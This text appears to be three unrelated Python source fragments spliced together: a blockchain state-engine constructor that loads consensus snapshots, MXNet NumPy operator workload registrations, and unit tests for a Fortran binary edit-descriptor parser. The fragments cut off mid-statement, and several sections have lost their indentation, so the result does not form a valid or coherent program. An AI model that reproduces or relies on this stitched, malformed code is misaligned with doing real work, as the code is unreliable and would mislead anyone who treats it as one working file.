    hashes for each block.
    This class will be fed a sequence of sets of transactions, grouped by block
    and ordered by block ID, that each contain an OP_RETURN. The nulldata
    associated with the OP_RETURN will be parsed, checked, logged, and
    committed by the implementation (impl). The implementation decides exactly
    what each of these mean; this class simply feeds it the transactions
    in the order they appeared on the blockchain.
    This class looks for OP_RETURN data that starts with the byte sequence in magic_bytes,
    and then only select those which start with magic_bytes + op, where op is an
    opcode byte in opcodes. Magic bytes can be of variable length, but it should
    be specific to this virtual chain.
    Expected OP_RETURN data format:
     0           M M+1                      len(OP_RETURN)-M-1
     |-----------|--|------------------------|
        magic    op        payload
    The job of the implementation is to translate the above data, plus anything else it
    can learn from the previously-parsed transactions and from other sources, into a
    dictionary of (field: value) tuples that constitute an operation.
    @magic_bytes: the `magic` field above.
    @opcodes: the list of possible values for the `op` field.
    @opfields: a dictionary that maps each `op` to a list of field names.
    The caller may supply an optional argument called 'state', which will be
    passed into each implementation method. It is meant to preserve implementation-
    specific state--in particular, whatever state the implementation expects to be
    present.
    If @expected_snapshots is given, then this is a dict that maps block heights
    to their expected consensus hashes. If the calculated consensus hash does not
    match the expected consensus hash, the state engine aborts the program.
    """
    # Use None-sentinels instead of the former mutable {} defaults: the dicts
    # were stored directly on the instance, so a shared default dict would be
    # silently shared (and mutated) across every StateEngine instance.
    self.consensus_hashes = initial_snapshots if initial_snapshots is not None else {}
    self.pending_ops = defaultdict(list)
    self.magic_bytes = magic_bytes
    self.opcodes = opcodes[:]
    self.opfields = copy.deepcopy(opfields)
    self.state = state
    self.impl = impl
    # NOTE(review): assumes impl provides get_first_block_id(); the impl=None
    # default would raise AttributeError here -- confirm callers always pass impl.
    self.lastblock = self.impl.get_first_block_id() - 1
    self.pool = None
    self.rejected = {}
    self.expected_snapshots = expected_snapshots if expected_snapshots is not None else {}
    self.backup_frequency = backup_frequency
    self.backup_max_age = backup_max_age
    self.read_only = read_only
    firsttime = True
    consensus_snapshots_filename = config.get_snapshots_filename(impl=impl)
    lastblock_filename = config.get_lastblock_filename(impl=impl)
    # if we crashed during a commit, and we're opening read-write, try to finish
    if not read_only:
        rc = self.commit( startup=True )
        if not rc:
            log.error("Failed to commit partial data. Rolling back and aborting.")
            self.rollback()
            traceback.print_stack()
            os.abort()
    # can be missing all files (i.e. this is the first time), or none of them
    for fp in [consensus_snapshots_filename, lastblock_filename]:
        if os.path.exists( fp ):
            # starting with existing data
            firsttime = False
    # attempt to load the snapshots
    if os.path.exists( consensus_snapshots_filename ):
        log.debug("consensus snapshots at '%s'" % consensus_snapshots_filename)
        try:
            with open(consensus_snapshots_filename, 'r') as f:
                db_dict = json.loads(f.read())
                assert 'snapshots' in db_dict
                self.consensus_hashes = db_dict['snapshots']
        # 'except ... as e' is valid on Python 2.6+ and 3.x, unlike the
        # Python-2-only 'except Exception, e' form used previously.
        except Exception as e:
            log.error("FATAL: Failed to read consensus snapshots at '%s'. Aborting." % consensus_snapshots_filename )
            log.exception(e)
            traceback.print_stack()
            os.abort()
    elif firsttime:
        # first run: seed the snapshots file with the initial hashes
        log.debug("consensus snapshots at '%s'" % consensus_snapshots_filename)
        try:
            with open( consensus_snapshots_filename, 'w') as f:
                f.write( json.dumps( {'snapshots': self.consensus_hashes} ) )
                f.flush()
        except Exception as e:
            log.error("FATAL: failed to store initial snapshots to %s. Aborting." % consensus_snapshots_filename )
            log.exception(e)
            traceback.print_stack()
            os.abort()
    else:
        # one state file exists but this one is missing: refuse to guess
        log.error("FATAL: No such file or directory: %s" % consensus_snapshots_filename )
        traceback.print_stack()
        os.abort()
    # what was the last block processed?
    if os.path.exists( lastblock_filename ):
        log.debug("lastblock at '%s'" % lastblock_filename)
        self.lastblock = self.get_lastblock( lastblock_filename=lastblock_filename )
        log.debug("Lastblock: %s (%s)" % (self.lastblock, lastblock_filename))
        if self.lastblock is None:
            # BUG FIX: the original also called log.exception(e) here, but no
            # exception is in scope on this path, so that call itself raised
            # a NameError instead of logging.
            log.error("FATAL: Failed to read last block number at '%s'. Aborting." % lastblock_filename )
            traceback.print_stack()
            os.abort()
    elif firsttime:
        # first run: record the starting block number
        log.debug("lastblock at '%s'" % lastblock_filename)
        try:
            log.debug("Store lastblock %s to %s" % (self.lastblock, lastblock_filename))
            with open(lastblock_filename, "w") as lastblock_f:
                lastblock_f.write("%s" % self.lastblock)
                lastblock_f.flush()
        except Exception as e:
            log.error("FATAL: failed to store initial lastblock to %s. Aborting." % lastblock_filename)
            log.exception(e)
            traceback.print_stack()
            os.abort()
    else:
        log.error("FATAL: No such file or directory: %s" % lastblock_filename )
        traceback.print_stack()
        os.abort()
def get_lastblock( self, lastblock_filename=None, impl=None, working_dir=None ):
"""
What was the last block processed?
Return the number on success
Return None on failure to read
"""
if lastblock_filename | |
vec1 = np.array([2])
vec2 = np.array([3, 4]).reshape(1, -1)
for dt in dtype:
v1 = vec1.astype(dt)
v2 = vec2.astype(dt)
OpArgMngr.add_workload('matmul', v1, v2)
OpArgMngr.add_workload('matmul', v2.T, v1)
def test_vector_vector_values():
vec1 = np.array([1, 2])
vec2 = np.array([3, 4]).reshape(-1, 1)
for dt in dtype:
v1 = vec1.astype(dt)
v2 = vec2.astype(dt)
OpArgMngr.add_workload('matmul', v1, v2)
# no broadcast, we must make v1 into a 2d ndarray
OpArgMngr.add_workload('matmul', v2, v1.reshape(1, -1))
def test_vector_matrix_values():
vec = np.array([1, 2])
mat1 = np.array([[1, 2], [3, 4]])
mat2 = np.stack([mat1]*2, axis=0)
for dt in dtype:
v = vec.astype(dt)
m1 = mat1.astype(dt)
m2 = mat2.astype(dt)
OpArgMngr.add_workload('matmul', v, m1)
OpArgMngr.add_workload('matmul', v, m2)
def test_matrix_vector_values():
vec = np.array([1, 2])
mat1 = np.array([[1, 2], [3, 4]])
mat2 = np.stack([mat1]*2, axis=0)
for dt in dtype:
v = vec.astype(dt)
m1 = mat1.astype(dt)
m2 = mat2.astype(dt)
OpArgMngr.add_workload('matmul', m1, v)
OpArgMngr.add_workload('matmul', m2, v)
def test_matrix_matrix_values():
mat1 = np.array([[1, 2], [3, 4]])
mat2 = np.array([[1, 0], [1, 1]])
mat12 = np.stack([mat1, mat2], axis=0)
mat21 = np.stack([mat2, mat1], axis=0)
for dt in dtype:
m1 = mat1.astype(dt)
m2 = mat2.astype(dt)
m12 = mat12.astype(dt)
m21 = mat21.astype(dt)
# matrix @ matrix
OpArgMngr.add_workload('matmul', m1, m2)
OpArgMngr.add_workload('matmul', m2, m1)
# stacked @ matrix
OpArgMngr.add_workload('matmul', m12, m1)
# matrix @ stacked
OpArgMngr.add_workload('matmul', m1, m12)
# stacked @ stacked
OpArgMngr.add_workload('matmul', m12, m21)
test_shapes()
test_result_types()
test_scalar_output()
test_vector_vector_values()
test_vector_matrix_values()
test_matrix_vector_values()
test_matrix_matrix_values()
def _add_workload_vstack(array_pool):
    """Register vstack workloads: a pair of arrays, then single-array inputs."""
    inputs = (
        (array_pool['4x1'], np.random.uniform(size=(5, 1))),
        array_pool['4x1'],
        array_pool['1x1x0'],
    )
    for arg in inputs:
        OpArgMngr.add_workload('vstack', arg)
def _add_workload_column_stack():
    """Register column_stack workloads: 1-D pair, column-vector pair, and a list input."""
    flat_pair = (np.array([1, 2, 3]), np.array([2, 3, 4]))
    col_pair = (np.array([[1], [2], [3]]), np.array([[2], [3], [4]]))
    OpArgMngr.add_workload('column_stack', flat_pair)
    OpArgMngr.add_workload('column_stack', col_pair)
    OpArgMngr.add_workload('column_stack', [np.array(_np.arange(3)) for _ in range(2)])
def _add_workload_hstack(array_pool):
    """Register hstack workloads: a pair of row arrays, then single-array inputs."""
    inputs = (
        (np.random.uniform(size=(1, 4)), np.random.uniform(size=(1, 4))),
        array_pool['4x1'],
        array_pool['1x1x0'],
    )
    for arg in inputs:
        OpArgMngr.add_workload('hstack', arg)
def _add_workload_dstack(array_pool):
    """Register dstack workloads: a 3-D pair, then single-array inputs."""
    inputs = (
        (np.random.uniform(size=(5, 1, 2)), np.random.uniform(size=(5, 1, 3))),
        array_pool['4x1'],
        array_pool['1x1x0'],
    )
    for arg in inputs:
        OpArgMngr.add_workload('dstack', arg)
def _add_workload_equal(array_pool):
    """Register elementwise equal workloads (fp16 and nan cases disabled, see TODOs)."""
    # TODO(junwu): fp16 does not work yet with TVM generated ops
    # OpArgMngr.add_workload('equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
    lhs = np.array([0, 1, 2, 4, 2], dtype=np.float32)
    rhs = np.array([-2, 5, 1, 4, 3], dtype=np.float32)
    OpArgMngr.add_workload('equal', lhs, rhs)
    # TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
    # OpArgMngr.add_workload('equal', np.array([np.nan]), np.array([np.nan]))
    OpArgMngr.add_workload('equal', array_pool['4x1'], array_pool['1x2'])
def _add_workload_not_equal(array_pool):
    """Register elementwise not_equal workloads (fp16 and nan cases disabled, see TODOs)."""
    # TODO(junwu): fp16 does not work yet with TVM generated ops
    # OpArgMngr.add_workload('not_equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
    lhs = np.array([0, 1, 2, 4, 2], dtype=np.float32)
    rhs = np.array([-2, 5, 1, 4, 3], dtype=np.float32)
    OpArgMngr.add_workload('not_equal', lhs, rhs)
    # TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
    # OpArgMngr.add_workload('not_equal', np.array([np.nan]), np.array([np.nan]))
    OpArgMngr.add_workload('not_equal', array_pool['4x1'], array_pool['1x2'])
def _add_workload_greater(array_pool):
    """Register elementwise greater workloads, including array-vs-scalar cases."""
    # TODO(junwu): fp16 does not work yet with TVM generated ops
    # OpArgMngr.add_workload('greater', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
    lhs = np.array([0, 1, 2, 4, 2], dtype=np.float32)
    rhs = np.array([-2, 5, 1, 4, 3], dtype=np.float32)
    OpArgMngr.add_workload('greater', lhs, rhs)
    OpArgMngr.add_workload('greater', array_pool['4x1'], array_pool['1x2'])
    # scalar on either side
    OpArgMngr.add_workload('greater', array_pool['4x1'], 2)
    OpArgMngr.add_workload('greater', 2, array_pool['4x1'])
    # TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
    # OpArgMngr.add_workload('greater', np.array([np.nan]), np.array([np.nan]))
def _add_workload_greater_equal(array_pool):
    """Register elementwise greater_equal workloads, including array-vs-scalar cases."""
    # TODO(junwu): fp16 does not work yet with TVM generated ops
    # OpArgMngr.add_workload('greater_equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
    lhs = np.array([0, 1, 2, 4, 2], dtype=np.float32)
    rhs = np.array([-2, 5, 1, 4, 3], dtype=np.float32)
    OpArgMngr.add_workload('greater_equal', lhs, rhs)
    OpArgMngr.add_workload('greater_equal', array_pool['4x1'], array_pool['1x2'])
    # scalar on either side
    OpArgMngr.add_workload('greater_equal', array_pool['4x1'], 2)
    OpArgMngr.add_workload('greater_equal', 2, array_pool['4x1'])
    # TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
    # OpArgMngr.add_workload('greater_equal', np.array([np.nan]), np.array([np.nan]))
def _add_workload_less(array_pool):
    """Register elementwise less workloads, including array-vs-scalar cases."""
    # TODO(junwu): fp16 does not work yet with TVM generated ops
    # OpArgMngr.add_workload('less', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
    lhs = np.array([0, 1, 2, 4, 2], dtype=np.float32)
    rhs = np.array([-2, 5, 1, 4, 3], dtype=np.float32)
    OpArgMngr.add_workload('less', lhs, rhs)
    OpArgMngr.add_workload('less', array_pool['4x1'], array_pool['1x2'])
    # scalar on either side
    OpArgMngr.add_workload('less', array_pool['4x1'], 2)
    OpArgMngr.add_workload('less', 2, array_pool['4x1'])
    # TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
    # OpArgMngr.add_workload('less', np.array([np.nan]), np.array([np.nan]))
def _add_workload_less_equal(array_pool):
    """Register elementwise less_equal workloads, including array-vs-scalar cases."""
    # TODO(junwu): fp16 does not work yet with TVM generated ops
    # OpArgMngr.add_workload('less_equal', np.array([0, 1, 2, 4, 2], dtype=np.float16), np.array([-2, 5, 1, 4, 3], dtype=np.float16))
    lhs = np.array([0, 1, 2, 4, 2], dtype=np.float32)
    rhs = np.array([-2, 5, 1, 4, 3], dtype=np.float32)
    OpArgMngr.add_workload('less_equal', lhs, rhs)
    OpArgMngr.add_workload('less_equal', array_pool['4x1'], array_pool['1x2'])
    # scalar on either side
    OpArgMngr.add_workload('less_equal', array_pool['4x1'], 2)
    OpArgMngr.add_workload('less_equal', 2, array_pool['4x1'])
    # TODO(junwu): mxnet currently does not have a consistent behavior as NumPy in dealing with np.nan
    # OpArgMngr.add_workload('less_equal', np.array([np.nan]), np.array([np.nan]))
def _add_workload_logical_and(array_pool):
    """Register logical_and workloads over float and boolean operands."""
    OpArgMngr.add_workload('logical_and', np.array([0, 1, 2, 4, 2], dtype=np.float32),
                           np.array([-2, 5, 1, 4, 3], dtype=np.float32))
    bool_lhs = np.array([False, False, True, True], dtype=np.bool)
    bool_rhs = np.array([False, True, False, True], dtype=np.bool)
    OpArgMngr.add_workload('logical_and', bool_lhs, bool_rhs)
def _add_workload_logical_or(array_pool):
    """Register logical_or workloads over boolean operands (incl. non-0/1 inputs cast to bool)."""
    OpArgMngr.add_workload('logical_or', np.array([0, 1, 2, 4, 2], dtype=np.bool),
                           np.array([-2, 5, 1, 4, 3], dtype=np.bool))
    bool_lhs = np.array([False, False, True, True], dtype=np.bool)
    bool_rhs = np.array([False, True, False, True], dtype=np.bool)
    OpArgMngr.add_workload('logical_or', bool_lhs, bool_rhs)
def _add_workload_logical_xor(array_pool):
    """Register logical_xor workloads over float and boolean operands."""
    OpArgMngr.add_workload('logical_xor', np.array([0, 1, 2, 4, 2], dtype=np.float32),
                           np.array([-2, 5, 1, 4, 3], dtype=np.float32))
    bool_lhs = np.array([False, False, True, True], dtype=np.bool)
    bool_rhs = np.array([False, True, False, True], dtype=np.bool)
    OpArgMngr.add_workload('logical_xor', bool_lhs, bool_rhs)
def _add_workload_where():
    """Register where workloads: boolean selection with full, scalar, and broadcast branches."""
    c = np.ones(53).astype(bool)
    d = np.ones_like(c)
    e = np.zeros_like(c)
    # full-array branches, then scalar y, then scalar x
    for x_arg, y_arg in ((e, e), (d, e), (d, e[0]), (d[0], e)):
        OpArgMngr.add_workload('where', c, x_arg, y_arg)
    # strided variants are currently disabled:
    # OpArgMngr.add_workload('where', c[::2], d[::2], e[::2])
    # OpArgMngr.add_workload('where', c[1::2], d[1::2], e[1::2])
    # OpArgMngr.add_workload('where', c[::3], d[::3], e[::3])
    # OpArgMngr.add_workload('where', c[1::3], d[1::3], e[1::3])
    # OpArgMngr.add_workload('where', c[::-2], d[::-2], e[::-2])
    # OpArgMngr.add_workload('where', c[::-3], d[::-3], e[::-3])
    # OpArgMngr.add_workload('where', c[1::-3], d[1::-3], e[1::-3])
    c = np.array([True, False])
    a = np.zeros((2, 25))
    b = np.ones((2, 25))
    # broadcast the condition down columns, then across transposed operands
    OpArgMngr.add_workload('where', c.reshape((2, 1)), a, b)
    OpArgMngr.add_workload('where', c, a.T, b.T)
def _add_workload_pad():
    """Register pad workloads covering every supported padding mode."""
    arr = np.array(_np.array([[1, 2, 3], [1, 2, 3]]))
    pad_width = ((5, 5), (5, 5))
    OpArgMngr.add_workload('pad', arr, pad_width, mode="constant", constant_values=0)
    OpArgMngr.add_workload('pad', arr, pad_width, mode="edge")
    # mirror-style modes take a reflect_type
    for mirror_mode in ("symmetric", "reflect"):
        OpArgMngr.add_workload('pad', arr, pad_width, mode=mirror_mode, reflect_type="even")
    OpArgMngr.add_workload('pad', arr, pad_width, mode="maximum")
    OpArgMngr.add_workload('pad', arr, pad_width, mode="minimum")
def _add_workload_nonzero():
    """Register nonzero workloads: scalars, empty/edge shapes, and boolean arrays."""
    OpArgMngr.add_workload('nonzero', np.random.randint(0, 2))
    for size in ((), (0, 1, 2), (0, 1, 0), (2, 3, 4)):
        OpArgMngr.add_workload('nonzero', np.random.randint(0, 2, size=size))
    OpArgMngr.add_workload('nonzero', np.array([False, False, False], dtype=np.bool_))
    OpArgMngr.add_workload('nonzero', np.array([True, False, False], dtype=np.bool_))
def _add_workload_diagflat():
    """Register diagflat workloads over several inputs and diagonal offsets."""
    def outer_sum_mat(n):
        # n x n matrix with entry (i, j) == i + j
        data = _np.arange(n)
        return _np.add.outer(data, data)
    A = np.array([[1, 2], [3, 4], [5, 6]])
    vals = (100 * np.arange(5)).astype('l')
    vals_c = (100 * np.array(outer_sum_mat(5)) + 1).astype('l')
    vals_f = np.array(_np.array((100 * outer_sum_mat(5) + 1), order='F', dtype='l'))
    # rectangular input across a wide range of offsets
    for k in (2, 1, 0, -1, -2, -3):
        OpArgMngr.add_workload('diagflat', A, k=k)
    # 1-D, C-ordered, and F-ordered inputs at representative offsets
    for source in (vals, vals_c, vals_f):
        for k in (0, 2, -2):
            OpArgMngr.add_workload('diagflat', source, k=k)
def _add_workload_shape():
    """Register shape workloads for scalar, empty, and 2-D inputs."""
    for size in ((), (0, 1), (2, 3)):
        OpArgMngr.add_workload('shape', np.random.uniform(size=size))
def _add_workload_diff():
    """Register diff workloads: 1-D vectors, n-D arrays across axes, and higher orders.

    Note: the assignment ``x[:, 1::2, :] = 1`` below restores a line that had
    been corrupted in this file into a non-syntactic token (it made the whole
    module unparseable); every-other-slab along axis 1 gives diff a non-trivial
    pattern to reduce.
    """
    x = np.array([1, 4, 6, 7, 12])
    OpArgMngr.add_workload('diff', x)
    OpArgMngr.add_workload('diff', x, 2)
    OpArgMngr.add_workload('diff', x, 3)
    OpArgMngr.add_workload('diff', np.array([1.1, 2.2, 3.0, -0.2, -0.1]))
    x = np.zeros((10, 20, 30))
    x[:, 1::2, :] = 1
    OpArgMngr.add_workload('diff', x)
    OpArgMngr.add_workload('diff', x, axis=-1)
    OpArgMngr.add_workload('diff', x, axis=0)
    OpArgMngr.add_workload('diff', x, axis=1)
    OpArgMngr.add_workload('diff', x, axis=-2)
    x = 20 * np.random.uniform(size=(10, 20, 30))
    OpArgMngr.add_workload('diff', x)
    OpArgMngr.add_workload('diff', x, n=2)
    OpArgMngr.add_workload('diff', x, axis=0)
    OpArgMngr.add_workload('diff', x, n=2, axis=0)
    x = np.array([list(range(3))])
    for n in range(1, 5):
        OpArgMngr.add_workload('diff', x, n=n)
def _add_workload_ediff1d():
    """Register ediff1d workloads, including to_end/to_begin variants."""
    def register_variants(arr):
        # plain call, scalar to_end/to_begin, then array-valued variants
        OpArgMngr.add_workload('ediff1d', arr)
        OpArgMngr.add_workload('ediff1d', arr, 2, 4)
        OpArgMngr.add_workload('ediff1d', arr, arr, 3)
        OpArgMngr.add_workload('ediff1d', arr, arr, arr)
    register_variants(np.array([1, 3, 6, 7, 1]))
    OpArgMngr.add_workload('ediff1d', np.array([1.1, 2.2, 3.0, -0.2, -0.1]))
    register_variants(np.random.randint(5, size=(5, 0, 4)))
def _add_workload_resize():
    """Register resize workloads for growing, shrinking, scalar, and empty arrays."""
    cases = (
        (np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype=np.int32), (5, 1)),
        (np.eye(3), 3),
        (np.ones(1), ()),
        (np.ones(()), (1,)),
        (np.eye(3), (3, 2, 1)),
        (np.eye(3), (2, 3, 3)),
        (np.ones(10), 15),
        (np.zeros((10, 0)), (0, 10)),
        (np.zeros((10, 0)), (0, 100)),
    )
    for arr, new_shape in cases:
        OpArgMngr.add_workload('resize', arr, new_shape)
def _add_workload_empty_like():
    """Register empty_like workloads with and without an explicit output dtype."""
    OpArgMngr.add_workload('empty_like', np.random.uniform(low=0, high=100, size=(1, 3, 4), dtype='float64'))
    dtype_cases = (
        ((9, 3, 1), np.int32),
        ((9, 3), 'float32'),
        ((9, 3, 1), np.bool_),
        ((0, 3), np.float32),
    )
    for size, out_dtype in dtype_cases:
        OpArgMngr.add_workload('empty_like', np.random.uniform(low=0, high=100, size=size), out_dtype)
def _add_workload_nan_to_num():
    """Register nan_to_num workloads over inf/nan-laden inputs, incl. custom fill values."""
    with_infs = np.array([[-433, 0, 456, _np.inf], [-1, -_np.inf, 0, 1]])
    mixed = np.array([_np.nan, _np.inf, -_np.inf, -574, 0, 23425, 24234, -5])
    neg_inf_scalar = np.array(-_np.inf)
    OpArgMngr.add_workload('nan_to_num', with_infs, True, 0, 100, -100)
    OpArgMngr.add_workload('nan_to_num', with_infs, True, 0.00)
    OpArgMngr.add_workload('nan_to_num', mixed, True)
    OpArgMngr.add_workload('nan_to_num', mixed, True, -2000, 10000, -10000)
    OpArgMngr.add_workload('nan_to_num', neg_inf_scalar, True)
def _add_workload_isnan(array_pool):
    """Register an isnan workload on the shared 2x4 pool array."""
    arr = array_pool['2x4']
    OpArgMngr.add_workload('isnan', arr)
def _add_workload_isinf(array_pool):
    """Register an isinf workload on the shared 2x4 pool array."""
    arr = array_pool['2x4']
    OpArgMngr.add_workload('isinf', arr)
def _add_workload_isposinf(array_pool):
    """Register an isposinf workload on the shared 2x4 pool array."""
    arr = array_pool['2x4']
    OpArgMngr.add_workload('isposinf', arr)
def _add_workload_isneginf(array_pool):
    """Register an isneginf workload on the shared 2x4 pool array."""
    arr = array_pool['2x4']
    OpArgMngr.add_workload('isneginf', arr)
def _add_workload_isfinite(array_pool):
    """Register an isfinite workload on the shared 2x4 pool array."""
    arr = array_pool['2x4']
    OpArgMngr.add_workload('isfinite', arr)
def _add_workload_polyval():
    """Register polyval workloads: long and degenerate coefficient vectors over several x inputs."""
    long_coeffs = np.arange(20)
    short_coeffs = np.arange(1)
    x_inputs = (np.arange(20), np.ones((3, 3)), np.array(2))
    for coeffs in (long_coeffs, short_coeffs):
        for x in x_inputs:
            OpArgMngr.add_workload('polyval', coeffs, x)
def _add_workload_linalg_cond():
A = np.array([[1., | |
_input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_673(self):
inp = '''1000'''
fmt = '''(B3.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_674(self):
inp = '''-1000'''
fmt = '''(B3.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_675(self):
inp = '''10000'''
fmt = '''(B3.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_676(self):
inp = '''-10000'''
fmt = '''(B3.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_677(self):
inp = '''100000'''
fmt = '''(B3.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_678(self):
inp = '''-100000'''
fmt = '''(B3.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_679(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(B3.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_680(self):
inp = '''10101000'''
fmt = '''(B3.3)'''
result = [5]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_681(self):
inp = '''0'''
fmt = '''(B4.3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_682(self):
inp = '''-0'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_683(self):
inp = '''1'''
fmt = '''(B4.3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_684(self):
inp = '''-1'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_685(self):
inp = '''2'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_686(self):
inp = '''10'''
fmt = '''(B4.3)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_687(self):
inp = '''-10'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_688(self):
inp = '''100'''
fmt = '''(B4.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_689(self):
inp = '''-100'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_690(self):
inp = '''1000'''
fmt = '''(B4.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_691(self):
inp = '''-1000'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_692(self):
inp = '''10000'''
fmt = '''(B4.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_693(self):
inp = '''-10000'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_694(self):
inp = '''100000'''
fmt = '''(B4.3)'''
result = [8]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_695(self):
inp = '''-100000'''
fmt = '''(B4.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_696(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(B4.3)'''
result = [4]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_697(self):
inp = '''10101000'''
fmt = '''(B4.3)'''
result = [10]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_698(self):
inp = '''0'''
fmt = '''(B5.3)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_699(self):
inp = '''-0'''
fmt = '''(B5.3)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_700(self):
inp = '''1'''
fmt = '''(B5.3)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
